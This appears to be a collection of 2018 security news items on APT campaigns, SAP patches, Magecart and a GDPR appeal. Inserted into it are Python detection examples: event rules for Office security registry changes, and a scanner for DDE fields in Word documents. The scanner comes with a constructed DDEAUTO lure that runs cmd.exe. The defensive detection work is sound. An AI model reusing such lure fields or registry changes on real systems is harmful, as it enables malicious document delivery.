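     "value": "VBAWarnings", "data": 1},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView",
     "value": "DisableInternetFilesInPV", "data": 1},
    {"type": "process", "image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "OneDrive", "data": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
]

if __name__ == "__main__":
    for rule, idx in sorted(evaluate(SAMPLE_EVENTS).items()):
        print(f"{rule:40s} events {idx}")
```

Each rule is deliberately narrow so that a single hit is a strong signal; in practice the parent/child pairs (Office spawning a script host, WmiPrvSE spawning PowerShell) are the most durable indicators, since file names under ProgramData and the exact one-liner change from campaign to campaign.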

Most of the group’s victims are in Jordan, Turkey, Iraq, Pakistan, Saudi Arabia, Afghanistan and Azerbaijan, but Russia, Iran, Bahrain, Austria and Mali were also impacted. The attacks, Kaspersky notes, are geopolitically motivated, targeting sensitive personnel and organizations.

“The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering, in addition to the active development of attacks, infrastructure and the use of new methods and techniques. The attackers are actively improving their toolkit in an effort to minimize their exposure to security products and services,” Kaspersky concludes.


KeyBoy Abuses Popular Office Exploits for Malware Delivery
11.10.2018 securityweek
Exploit  Virus

A group of hackers believed to be operating out of China was observed using popular Microsoft Office exploits for the delivery of malware.

The actor, known as KeyBoy, was first identified in 2013 and has been observed mainly targeting governments and other organizations in South East Asia. The group continues to be active, although it has expanded the targets list, and even hit the energy sector.

Recently, the group was seen abusing an open source version of the popular CVE-2017-0199 exploit to target India's Ambassador to Ethiopia. The actor used a phishing email with an attached document that would download and execute a script to install the final payload.

According to AlienVault, which has been tracking KeyBoy’s whereabouts, the group has been also testing the use of another exploit generator. Because the actor didn’t change the default settings in the tool, the document meta-data included obvious hints that the document was malicious.

In this case, however, the data hinted at another Office exploit that was previously abused in attacks, namely CVE-2017-8570.

The attacks, AlienVault says, were meant to drop the malware family known as TSSL to the victims’ computers. The malware had been associated with the group last year, and was present in more recent attacks as well.

In August 2018, Citizen Lab detailed a campaign targeting Tibetan activists, journalists, members of the Tibetan Parliament in exile, and the Central Tibetan Administration, where TSSL was also used. They linked the campaign to a larger operation called Tropic Trooper, which was exposed in 2016.

The group also continued delivering the Android malware family known as Titan, AlienVault’s security researchers reveal. While the infections continue, however, only older sources of the files have been identified.

The files were traced back to a user posting malicious APKs on a Taiwanese site (apk.tw) for downloading Android applications. However, the individual stopped posting several years ago, and the researchers couldn’t identify a new source of Titan samples.


New Gallmaker APT group eschews malware in cyber espionage campaigns
11.10.2018 securityaffairs
APT

A previously unknown cyber espionage group, tracked as Gallmaker, has been targeting entities in the government, military and defense sectors since at least 2017.
A new cyber espionage group tracked as Gallmaker appeared in the threat landscape. According to researchers from Symantec, who first spotted the threat actor, the group has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.

Gallmaker is a politically motivated APT group that focuses its surgical operations on the government, military and defense sectors.

Gallmaker has been active since at least December 2017; researchers observed a spike in its operations in April, and the most recent attacks were uncovered in June.


The experts speculate that the threat actor is nation-state sponsored; it is interesting to note that the APT relies entirely on code scraped from the public internet.

“This group eschews custom malware and uses living off the land (LotL) tactics and publicly available hack tools to carry out activities that bear all the hallmarks of a cyber espionage campaign,” reads the analysis published by Symantec.

“The most interesting aspect of Gallmaker’s approach is that the group doesn’t use malware in its operations. Rather, the attack activity we observed is carried out exclusively using LotL tactics and publicly available hack tools.”

Gallmaker uses spear phishing messages carrying a weaponized Office document that abuses the Dynamic Data Exchange (DDE) protocol to execute commands in the memory of the targeted device.

“These lure documents use titles with government, military, and diplomatic themes, and the file names are written in English or Cyrillic languages. These documents are not very sophisticated, but evidence of infections shows that they’re effective.” continues Symantec.

“By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect.”

Once the attackers gain access to a target machine, they use various tools, including the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.

Experts discovered that Gallmaker is using three primary IP addresses for its C&C infrastructure; they also noticed that the attackers delete some of their tools from compromised machines once the attack is completed, likely to hide traces of their activity.

“The fact that Gallmaker appears to rely exclusively on LotL tactics and publicly available hack tools makes its activities extremely hard to detect. We have written extensively about the increasing use of LotL tools and publicly available hack tools by cyber criminals.” concluded Symantec. “One of the primary reasons for the increased popularity of these kinds of tools is to avoid detection; attackers are hoping to “hide in plain sight”, with their malicious activity hidden in a sea of legitimate processes.”


SAP October 2018 set of patches fixes first Hot News security note for SAP BusinessObjects in 5 years
11.10.2018 securityaffairs
Vulnerability

SAP released its October 2018 set of patches; it includes the first Hot News security note for SAP BusinessObjects in over five years.
The October 2018 set includes 11 new security notes, plus 4 updates to previously released notes.

In total the release covers 15 notes, 2 of them rated Hot News; one of the two is the first Hot News note for SAP BusinessObjects in over five years.

“SAP BusinessObjects BI Suite has an Information Disclosure vulnerability (CVSS Base Score: 9.8 CVE-2018-2471). An attacker can use it to reveal additional information (system data, debugging information, etc.) that will help to learn about a system and plan other attacks.” reads a blog post published by ERPScan.

The remaining notes include 4 rated High priority and 9 rated Medium priority; in October, Information Disclosure is the largest group in terms of the number of vulnerabilities.


The most important note (CVSS score 9.8) addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client, tracked as CVE-2018-2471.

“Under certain conditions SAP BusinessObjects Business Intelligence Platform 4.10 and 4.20 allows an attacker to access information which would otherwise be restricted.” reads the security advisory.

The second Hot News item in the October 2018 set is an update to a Security Note released in April 2018; it provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws addressed by SAP in October are:

2699726 [CVE-2018-2475] Missing network isolation in Gardener. Product: project “Gardener”; versions: 0.12.2. Priority: High, CVSS 8.5.

2674215 Denial of service (DoS) in OPC UA applications of SAP Plant Connectivity. Related CVEs: CVE-2018-12585, CVE-2018-12086. Product: SAP Plant Connectivity; versions: 15.0, 15.1, 15.2. Priority: High, CVSS 8.2.

2392860 Update to Security Note released on February 2017 Patch Day: Leveraging privileges by customer transaction code. Product: SAP Records Management; versions: 7.0 to 7.02, 7.10, 7.11, 7.30, 7.31, 7.40, 7.50, 7.51. Priority: High, CVSS 8.0.

2681207 Update to Security Note released on September 2018 Patch Day: [CVE-2018-2465] Missing XML Validation vulnerability in SAP HANA, Extended Application Services classic model. Product: SAP HANA; versions: 1.0, 2.0. Priority: High, CVSS 7.5.
Experts from security firm ERPScan noted that the missing network isolation in Gardener could theoretically be chained with other issues to compromise clusters in the application context.

The other SAP security notes address vulnerabilities in NetWeaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

This patch update also addresses 5 Support Package Notes.


Imperva to be Acquired for $2.1 Billion by Thoma Bravo
11.10.2018 securityweek
IT

Cybersecurity solutions firm Imperva today announced that it has agreed to be acquired by private equity firm Thoma Bravo for roughly $2.1 billion in cash.

Imperva, which provides solutions such as DDoS protection, Web Application Firewall (WAF), and database security tools, said the company’s Board of Directors unanimously approved the agreement and believes the transaction will maximize stockholder value.

Under the terms of the agreement, Imperva stockholders will receive $55.75 per share in cash.

Upon the close of the transaction, Imperva will operate as a privately-held company and will maintain its corporate headquarters in Redwood Shores, California and continue to be led by its current executive team.

While Thoma Bravo is hopeful that the deal will close, the merger agreement provides for a 45-day “go-shop” period, during which Imperva’s Board and advisors may actively solicit alternative acquisition proposals and enter into negotiations with other parties.

“During this period, Imperva will have the right to terminate the merger agreement to enter into a superior proposal subject to the terms and conditions of the merger agreement. There can be no assurance this 45-day “go-shop” period will result in a superior proposal. Imperva does not intend to disclose developments about this process unless and until its Board has made a decision with respect to any potential superior proposal,” Imperva said.

Thoma Bravo has placed several large bets through investments in cybersecurity space in recent years.

In May, it announced that it would acquire a majority interest in Security Information and Event Management (SIEM) solutions vendor LogRhythm. In June, the firm acquired a majority interest in identity and access management (IAM) solutions firm Centrify.

Other investments in the sector include SonicWall, SailPoint, Hyland Software, Deltek, Blue Coat Systems, Imprivata, Bomgar, Barracuda Networks, Compuware and SolarWinds.

“Thoma Bravo has an excellent track record of supporting and adding value to leading cybersecurity companies, and we are delighted to bring on a partner with their caliber of strategic expertise,” said Chris Hylen, President and CEO of Imperva. “This transaction will provide immediate and substantial value to Imperva stockholders. The company will have greater flexibility to focus on executing our long-term strategy. We are excited to begin our partnership with Thoma Bravo.”


Windows Zero-Day Exploited in Attacks Aimed at Middle East
11.10.2018 securityweek
Vulnerability

One of the vulnerabilities patched by Microsoft with its latest Patch Tuesday updates is a Windows zero-day exploited by an advanced persistent threat (APT) group in attacks aimed at entities in the Middle East.

The flaw, tracked as CVE-2018-8453, has been described by Microsoft as a privilege escalation issue related to how the Win32k component of Windows handles objects in memory. An authenticated attacker can exploit the vulnerability to take control of an affected system.

The vulnerability was reported to Microsoft by Kaspersky Lab after one of the security firm's systems detected an exploitation attempt. Kaspersky said it had reported the vulnerability to Microsoft on August 17 – it's unclear why Microsoft waited so long to release a fix.

According to Kaspersky, CVE-2018-8453 has been exploited by an APT group it tracks as FruityArmor. The exploit was executed by a malware installer for obtaining the privileges needed to gain persistence on the targeted system.

The security firm said FruityArmor created a high quality and reliable exploit that would work on as many versions of Windows as possible, including Windows 10.

Kaspersky has described the vulnerability as a use-after-free bug that is similar to CVE-2017-0263, a flaw patched by Microsoft back in May 2017 after it had been exploited by the Russia-linked threat actor known as APT28, Sofacy and Fancy Bear.

Hackers packaged the CVE-2018-8453 exploit in a malware installer that requires system privileges to deploy its payload. The payload has been described as a "sophisticated implant used by the attackers for persistent access to the victims' machines."

Kaspersky has seen the exploit being used against fewer than a dozen targets located in the Middle East.

"So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved," Kaspersky researchers explained.

The company determined that FruityArmor is likely behind these attacks after discovering a PowerShell backdoor that in the past was only used by this APT group. In addition, some of the command and control (C&C) domains used in the latest campaign were also involved in past FruityArmor operations.

A blog post published early on Wednesday by Kaspersky contains technical details on the vulnerability and how it has been exploited by FruityArmor.

This is not the first time Kaspersky has come across a zero-day vulnerability exploited by FruityArmor. The hackers also exploited a Windows zero-day back in 2016, which Microsoft patched in October 2016 after being alerted by Kaspersky. At the time, the victims were researchers, activists and government-related individuals in Thailand, Iran, Algeria, Yemen, Saudi Arabia and Sweden.

"We believe that although FruityArmor´s activity has been slowly increasing during the last two years, the extremely targeted nature of the attacks helps them fly below the radar," Kaspersky said.


Many Siemens Products Affected by Foreshadow Vulnerabilities
11.10.2018 securityweek
Vulnerability

Siemens informed customers this week that many of its products are affected by the recently disclosed processor vulnerabilities known as Foreshadow and L1 Terminal Fault (L1TF).

There are a total of three Foreshadow vulnerabilities affecting Intel Core and Xeon CPUs: CVE-2018-3615, which impacts Intel’s Software Guard Extensions (SGX); CVE-2018-3620, which impacts operating systems and System Management Mode (SMM); and CVE-2018-3646, which affects virtualization software and Virtual Machine Monitors (VMM).

The security holes could allow malicious applications to obtain potentially sensitive information from a device's memory, including data associated with operating systems, apps and virtual machines.

Siemens noted that several of its industrial products use the impacted Intel processors, including RUGGEDCOM, SIMATIC, SIMOTION and SINUMERIK devices. The Siemens advisory lists more than 30 affected products.

The company has released BIOS updates, workarounds and mitigations to help users prevent potential attacks exploiting the Foreshadow vulnerabilities. The German industrial giant has also advised customers to install available operating system updates.

BIOS updates are currently available for SIMATIC IPC, SIMATIC Field PG, SIMATIC ITP, SIMOTION P and SINUMERIK PCU devices, and the company is working on releasing firmware patches for other products as well.

Since Foreshadow requires the attacker to execute a malicious application on the targeted system, Siemens recommends "limiting the possibilities to run untrusted code if possible," including by applying defense-in-depth methods.

Several organizations have released advisories for the Foreshadow vulnerabilities, including Cisco, F5 Networks, HPE, Synology, Huawei, Lenovo, SonicWall, NetApp, and CERT/CC. While NIST and some of the vendors have classified the flaws as "medium severity," Siemens, Huawei, Lenovo, SonicWall, NetApp, and HPE have assigned CVSS scores that put them in the "high severity" category.


Cyberspy Group 'Gallmaker' Targets Military, Government Organizations
11.10.2018 securityweek
CyberSpy

A previously undocumented cyber espionage group has been targeting entities in the government, military and defense sectors since at least 2017, according to a report published on Wednesday by Symantec.

The threat actor, tracked by the security firm as Gallmaker, has launched attacks on several overseas embassies of an unnamed Eastern European country, and military and defense organizations in the Middle East.

Symantec researchers noted that Gallmaker attacks appear highly targeted, with all known victims being related to the government, military or defense sectors.

The group has been active since at least December 2017 and its most recent attacks were observed in June 2018 – a spike in Gallmaker activity was seen in April. Gallmaker has focused on cyber espionage and experts believe it's likely sponsored by a nation state.

Asked by SecurityWeek about links to other threat actors and the possible location of the hackers, Symantec noted that it tracks Gallmaker as a new cyber espionage group and said it had no information to share on who may be behind the attacks or where the attackers are located.

The security firm pointed out that Gallmaker is interesting because it does not use any actual malware in its operations and instead relies on publicly available tools – this is known in the industry as "living off the land."

Gallmaker attacks start with a specially crafted Office document most likely delivered via phishing emails. The documents are designed to abuse the Dynamic Data Exchange (DDE) protocol to execute commands in the memory of the targeted device.

"By running solely in memory, the attackers avoid leaving artifacts on disk, which makes their activities difficult to detect," Symantec's Attack Investigations Team wrote in a blog post.

Microsoft disabled DDE last year after malicious actors started exploiting it in their attacks. However, Symantec said Gallmaker victims failed to install the Microsoft update that disabled the problematic feature.
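Both Gallmaker write-ups on this page (the securityaffairs piece above and this one) describe the same DDE lure technique, so one check serves both. The Python below is an added example, not Symantec's code nor anything from Gallmaker's toolkit: it unpacks a .docx and reports any field code that invokes DDE or DDEAUTO, which is the check a mail gateway or an analyst triaging a suspect attachment can run regardless of whether the endpoint has Microsoft's DDE-disabling update. The two documents it inspects are constructed in memory for the example (the command inside the lure field is a harmless placeholder, not Gallmaker's real payload), and the function names (field_codes, find_dde, build_docx) are the example's own.

```python
"""Scan a .docx for DDE / DDEAUTO field codes, the Office feature abused by
Gallmaker lures. Added example: the sample documents are constructed in
memory so the script runs offline; no real lure is embedded."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def field_codes(part_xml: bytes):
    """Yield every field instruction in a WordprocessingML part, in order.
    Complex fields are split across <w:instrText> runs between fldChar
    begin/end markers; the fragments are joined before matching, because
    lures split 'DDEAUTO' across runs to defeat naive string searches."""
    root = ET.fromstring(part_xml)
    buf = None
    for el in root.iter():
        if el.tag == W + "fldSimple":
            yield el.get(W + "instr", "")
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                buf = []
            elif kind == "end" and buf is not None:
                yield "".join(buf)
                buf = None
        elif el.tag == W + "instrText" and buf is not None:
            buf.append(el.text or "")


def find_dde(docx_bytes: bytes):
    """Return the DDE field codes found in any word/*.xml part. Headers and
    footers are evaluated by Word just like the body, so all parts are scanned."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                codes = field_codes(zf.read(name))
                hits += [c.strip() for c in codes if DDE_RE.search(c)]
            except ET.ParseError:
                continue  # a malformed part is suspicious in itself, but not a DDE hit
    return hits


def build_docx(body_xml: str) -> bytes:
    """Build a minimal .docx container around the given <w:body> contents.
    Constructed for the example; real documents carry many more parts."""
    doc = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>' % (W_NS, body_xml))
    types = ('<?xml version="1.0" encoding="UTF-8"?>'
             '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
             '<Default Extension="xml" ContentType="application/xml"/>'
             '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
             'officedocument.wordprocessingml.document.main+xml"/></Types>')
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", types)
        zf.writestr("word/document.xml", doc)
    return out.getvalue()


# Constructed lure: a DDEAUTO field whose keyword is split across two runs and
# whose visible result text is an innocuous "Loading..." placeholder.
MALICIOUS_BODY = (
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText>DDEA</w:instrText></w:r>'
    '<w:r><w:instrText>UTO c:\\windows\\system32\\cmd.exe "/k calc.exe"</w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Loading...</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
)
# Constructed benign document: an ordinary DATE field.
BENIGN_BODY = ('<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; ">'
               '<w:r><w:t>1 January 2018</w:t></w:r></w:fldSimple></w:p>')

if __name__ == "__main__":
    for label, body in (("lure", MALICIOUS_BODY), ("benign", BENIGN_BODY)):
        print(label, find_dde(build_docx(body)) or "no DDE fields")
```

Joining the instrText fragments before matching is the important design choice: a search for the literal string "DDEAUTO" in document.xml misses the split-run form, while the field-level view sees exactly what Word will execute.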

Once they gain access to a machine, the attackers use various tools to achieve their objectives. The list includes the reverse_tcp reverse shell from Metasploit, the WindowsRoamingToolsTask PowerShell scheduler, the WinZip console, and an open source library named Rex PowerShell, which helps create PowerShell scripts for Metasploit exploits.

Researchers also noticed that the attackers have deleted some of their tools from compromised machines once they were done, likely in an effort to hide their activities.


First GDPR Enforcement is Followed by First GDPR Appeal
11.10.2018 securityweek
Privacy

In what has been billed as the world's first GDPR action, the UK regulator -- the Information Commissioner's Office (ICO) -- quietly issued an enforcement notice against Canadian firm AggregateIQ Data Services Ltd (AIQ). It is a low-key affair. Although the enforcement notice was issued on 6 July 2018, the notice was not and has not been placed on the ICO's enforcement action page.

Instead, the notice was attached as an appendix to an investigation report by the ICO. There it largely remained unnoticed until found by law firm Mishcon de Reya LLP in September. SecurityWeek asked the ICO, "Is there any reason for the only occurrence (that I can find) of the notice appearing as an addendum to a longer report?" All other questions were answered, but SecurityWeek did not receive a direct answer to this direct question.

However, we were told that AIQ had appealed the notice. Appeals go to the First-tier Tribunal of the General Regulatory Chamber (GRC). They are not normally made public in the UK. SecurityWeek approached the GRC and asked for a copy -- and has now received a copy, slightly redacted, of AIQ's appeal against the GDPR enforcement notice.

Our first article discussed the reasoning behind the ICO's enforcement notice. Now we can look at AIQ's arguments against it. This is an important issue. While lawmakers make laws, it is the judiciary that interprets them. Neither the lawmakers nor the regulators know how the letter of the law will play out until the law has been tested in front of the judiciary. Equally, the subject of the laws -- in this case businesses that use the personal data of EU citizens around the world -- cannot fully understand their exposure to the law until it has faced the scrutiny of the judiciary.

The first specified ground for the appeal is that the ICO has no jurisdiction over AIQ "in this matter". This implies that the reason for appeal is not based on geography, but on the application of the law. SecurityWeek talked to a UK-based lawyer to understand the basis for the AIQ appeal.

AIQ claims, "There is no evidence whatsoever of any 'processing' of the data held for the purposes of 'monitoring' after the in-force date of the GDPR and DPA in 2018..." This may become the pivotal section of the appeal. Was, in GDPR terms, AIQ a data controller and/or a data processor?

"If AIQ is a Data Controller," comments David Flint, Senior Partner at MacRoberts LLP, "there would be an overriding issue of how it had a lawful basis for processing and meeting the [GDPR] Article 5 Principles. If it were a Processor, the question would be the compliance with Article 5 of those who gathered the information and whether they knew that AIQ would be processing the data."

Flint believes that AIQ's term 'monitoring' relates to 'profiling' within the legislation. Recital (24) of GDPR says "profiling a natural person, particularly in order to take decisions concerning her or him or for analysing or predicting her or his personal preferences, behaviours and attitudes", where there is any evaluation of response or otherwise to the activity. The ICO enforcement notice, comments Flint, "suggests that this is what was being done and why the data was being processed."

He adds that "'processing' also includes holding the data, so the fact that the data was still 'held' on 31 May would, in my opinion bring the activities of AIQ squarely within the scope of the GDPR/DPA2018." This is an important point for all companies that may store and forget they have EU data. They don't have to do anything with that data. Merely storing it makes them a data processor under GDPR.

Noticeably, Equifax said that it had 'forgotten' about the storage of EU citizen data in the U.S. This forgotten data resulted in a £500,000 fine from the ICO after the breach.

Data subject 'consent' is likely to be a key issue within GDPR. The ICO finds that the data subjects did not consent for AIQ to use their data. AIQ responds that the ICO has provided no proof that it lacked the consent of the subjects, and it believes that they had provided the information voluntarily to AIQ's clients with at least 'implied consent'. If the tribunal finds in favor of the ICO, it will reinforce the idea that organizations will need to obtain and be able to demonstrate actual and explicit consent from every EU citizen.

AIQ also argues that 'natural justice' should mitigate in its favor. "The position taken by the ICO in the Enforcement Notice and the Order," it claims, "is contrary to the principles of fairness and natural justice (which also may be referred to as the duty on the ICO to act fairly), and breaches AggregateIQ's right to a fair hearing."

Flint has little sympathy here. "I think the arguments of 'natural justice' fall away where there is a specific statutory provision prohibiting the behavior in question," he told SecurityWeek. "The only argument might be one based on ECHR but that would mean that the GDPR was invalid as being in breach." This in itself is an interesting comment. If the appeal were to the European Court of Human Rights, it would largely come down to whether business' rights take precedence over citizens' rights -- which seems unlikely. But if they did, then GDPR would be invalidated as in breach of the European Constitution (just as the original Safe Harbor agreement between the EU and the U.S. was invalidated).

In fairness to AIQ, this is the one section of the appeal that has been largely redacted by the Tribunal. Elsewhere in the appeal, AIQ accuses the ICO of "taking a position which is contrary to previous positions taken by the ICO, resulting in substantial unfairness and the denial of natural justice to AggregateIQ." We will not know until the hearing whether there is any link between the redacted section and AIQ's comment on 'previous positions', nor whether the Tribunal will consider this to be important.

The AIQ Appeal is number EA/2018/0153 with the Tribunal. It was received on 30 July 2018. At the time of writing this, there is no further information on the Tribunal's appeals table.

The result of the appeal is likely to be important. Much of it seems to be unconvincing -- but it doesn't matter what the lawmakers, the regulators, businesses, lawyers or the media think. In the end, it all comes down to how the judiciary interprets the law and the incident. It would be natural for the regulators to put their toe in the water before potentially going after big companies like Google or Facebook. This may partly explain the low publicity so far afforded to this first case.

"Lots to think about," comments Flint; "and an interesting case to follow particularly given that other cases are starting to line up! Wonder what the Tribunal (and I suspect in due course the Courts) will make of it." The final result may well provide clues to how GDPR is likely to play out over the next few years.

There is, however, one further point worth noting. The ICO enforcement notice requires certain action by AIQ. There is no imposed monetary penalty. This leaves one issue undiscussed. If an EU regulator were to impose a financial penalty on an extra-territorial entity, how -- or even could -- that penalty be enforced?


SAP Patches Critical Vulnerability in BusinessObjects
11.10.2018 securityweek
Vulnerability

This week, SAP released its October 2018 set of patches, which includes the first Hot News security note for SAP BusinessObjects in over five years.

SAP included 11 security notes in its October 2018 Security Patch Day, to which it also added 4 updates to previously released notes. Thus, the patches include 15 notes: 2 rated Hot News, 4 High priority, and 9 Medium priority.

Featuring a CVSS score of 9.8, the most important of the notes addresses an information disclosure issue in the SAP BusinessObjects Business Intelligence Suite client (CVE-2018-2471).

An analytics business intelligence front-end platform, BusinessObjects provides customers with the ability to search and analyze data, and with the option to visualize it and perform predictive analytics.

The information disclosure bug can be triggered through the execution of certain special Central Management Server (CMS) scripts on the Central Management Server. The execution is performed without properly checked authorizations, as ERP and business-critical application security company Onapsis explains.

Additionally, SAP tagged as Hot News an update to a note released in April 2018, which provides security updates for the Chromium browser delivered with SAP Business Client.

The High priority flaws include missing network isolation in Gardener (CVE-2018-2475), denial of service (DoS) in OPC UA applications of SAP Plant Connectivity (CVE-2018-12585, CVE-2018-12086), and updates to previously released notes, affecting SAP Records Management and SAP HANA.

The missing network isolation flaw in Gardener can be combined with other security issues to theoretically lead to the compromise of clusters in the application context, ERPScan, a company that specializes in securing Oracle and SAP products, reveals.

The remaining SAP security notes address bugs in Netweaver Application Server for ABAP (CVE-2018-2470), BusinessObjects (CVE-2018-2472, CVE-2018-2467), Data Services (CVE-2018-2466), Plant Connectivity (CVE-2017-12069), Adaptive Server Enterprise (CVE-2018-2469, CVE-2018-2468), and Fiori (CVE-2018-2474).

Five support package notes are added to the 15 Security Patch Day notes, for a total of 20 security notes. Six of the notes are updates to previously released security notes.

Information disclosure was the most encountered type of vulnerability, followed by cross-site scripting (XSS), XML external entity (XXE), and cross-site request forgery (CSRF).


Magecart Attack Hits 'Shopper Approved'
11.10.2018 securityweek
Attack

Magecart, the web-based card skimmer campaign that targets popular e-commerce websites, has hit Shopper Approved, an organization that provides rating seals for online stores.

The first Magecart attacks were observed a couple of years ago, and they continue to be active. Earlier this year, the cybercriminals behind the operation hit several high profile targets, including British Airways, Ticketmaster, and Newegg.

The hackers also targeted cloud service provider Feedify, which resulted in the potential compromise of hundreds of e-commerce websites.

Now, RiskIQ, the company that has been tracking Magecart since 2015, reveals that the attack on Shopper Approved too was an attempt to skim payment information from multiple online stores at once.

The compromise was first observed on September 15, when RiskIQ received an incident notification regarding Magecart. The attackers had replaced the normal certificate.js file for Shopper Approved with one that included their skimmer.

The attackers apparently replaced the file twice within a 15-minute window, because they forgot to obfuscate their skimmer at first, which allowed the RiskIQ security researchers to have a look at the deobfuscated code.

The researchers also discovered that the skimmer used the same drop server as the script used in the Feedify attack earlier this year.

Shopper Approved removed the malicious code on September 17, and also launched an internal investigation to find out how the compromise happened and who was affected.

“Fortunately, we were able to quickly detect and secure the code related to the incident. We also put additional security measures in place to help ensure that this doesn't happen again,” Scott Brandley, co-founder of Shopper Approved, says in a notice on their website.

“After a thorough investigation, we were able to determine that only a very small percentage of our clients were involved, and we have already reached out to those clients directly in an effort to help them remediate any issues,” the notice reads.

RiskIQ too notes that only a small number of clients were impacted, despite the fact that Shopper Approved is active on thousands of websites.

Mitigating factors, the security researchers note, include the fact that prominent shopping carts are actively blocking third-party scripts from being allowed to display on checkout pages and that most Shopper Approved clients did not have the compromised script on their actual checkout pages.

Moreover, the skimmer code was designed to only look for checkout pages with specific keywords in the URL. Thus, the script did not impact pages that did not include those keywords.

“Magecart groups are carrying out a full-scale assault on e-commerce and show zero signs of stopping. […] Now, Magecart operatives have learned to tune the CDNs they compromise to ensure that the only sites they hit are online stores. To achieve their goals, they will go after any analytics company, CDN, or any service supplying functionality to e-commerce websites,” RiskIQ concludes.


CVE-2018-8453 Zero-Day flaw exploited by FruityArmor APT in attacks aimed at Middle East
10.10.2018 securityaffairs
APT  Vulnerability

A Windows zero-day flaw addressed by Microsoft with its latest Patch Tuesday updates is exploited by an APT group in attacks aimed at entities in the Middle East.
The Windows zero-day vulnerability tracked as CVE-2018-8453 is a privilege escalation flaw that was exploited by an APT group in attacks against entities in the Middle East.

The flaw, tracked as CVE-2018-8453, is related to how the Win32k component of Windows handles objects in memory.

The flaw, discovered by experts from Kaspersky Lab, could be exploited by an authenticated attacker to take control of an affected system.

Kaspersky Lab reported the vulnerability to Microsoft on August 17, roughly two months ago.

Kaspersky revealed that the CVE-2018-8453 vulnerability has been exploited by the APT group tracked as FruityArmor, a cyber-espionage group that was first observed in 2016 while targeting activists, researchers, and individuals related to government organizations.

Experts believe FruityArmor's activity has been slowly increasing during the last two years.

The zero-day exploit was included in a malware installer used by the group to escalate privileges on the target machine and to gain persistence.

The final payload dropped by the malware was a sophisticated implant used by the attackers for persistent access to the victims’ machines.

“In August 2018 our Automatic Exploit Prevention (AEP) systems detected an attempt to exploit a vulnerability in Microsoft Windows operating system. Further analysis into this case led us to uncover a zero-day vulnerability in win32k.sys.” reads the report published by Kaspersky.

“The exploit was executed by the first stage of a malware installer to get necessary privileges for persistence on the victim’s system. The code of the exploit is of high quality and written with the aim of reliably exploiting as many different MS Windows builds as possible, including MS Windows 10 RS4.”

The zero-day resembles an older vulnerability tracked as CVE-2017-0263, which Microsoft fixed in May 2017 and which had been exploited by the Russia-linked cyberespionage group tracked as APT28.

The zero-day exploit was used in targeted attacks against less than a dozen entities located in the Middle East.

“So far, this campaign has been extremely targeted, affecting a very low number of victims in the Middle East region, probably persons of interest for the attackers. However, the victimology is not clear, especially with such a small number of victims involved.” continues the report.

The attribution was possible due to the detection of a PowerShell backdoor that has previously been exclusively used by the FruityArmor APT. Experts also confirmed an overlap in the C2 infrastructure between the last campaign and previous attacks attributed to the group.

Further technical details are reported by Kaspersky experts in their analysis.


Group-IB: $49.4 million of damage caused to Russia’s financial sector from cyber attacks
10.10.2018 securityaffairs
Cyber

Security firm Group-IB has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector
Group-IB, an international company that specializes in preventing cyber attacks, has estimated that in H2 2017-H1 2018 cyber attacks caused $49.4 million (2.96 billion rubles) of damage to Russia’s financial sector. As stated in Group-IB’s annual report “Hi-Tech Crime Trends 2018” presented at the CyberCrimeCon18 conference, every month, 1-2 banks lose money as a result of cyber attacks, and the damage caused by one successful theft is, on average, $2 million.

“Financial motivation still prevails among APT groups; however, stolen money is not the most dangerous thing that could happen to a financial organization,” says Ilya Sachkov, Group-IB CEO and founder. “Since in many countries banks are considered critical infrastructure, they are the targets for state-sponsored hacker groups, specialized in sabotage. One successful attack is capable of destroying one financial organization and even the collapse of a state financial system. Considering this, banks need to rethink their approach to protection against cyber threats. Defense is an outdated strategy. It’s time to stop being victims and become hunters.”

In the new report, Group-IB experts described in detail the cyber threats to the financial sector—active APT groups, tactics of the attackers, infection vectors, and new hacker tools.

Targeted attacks on banks:

Active groups and withdrawal methods

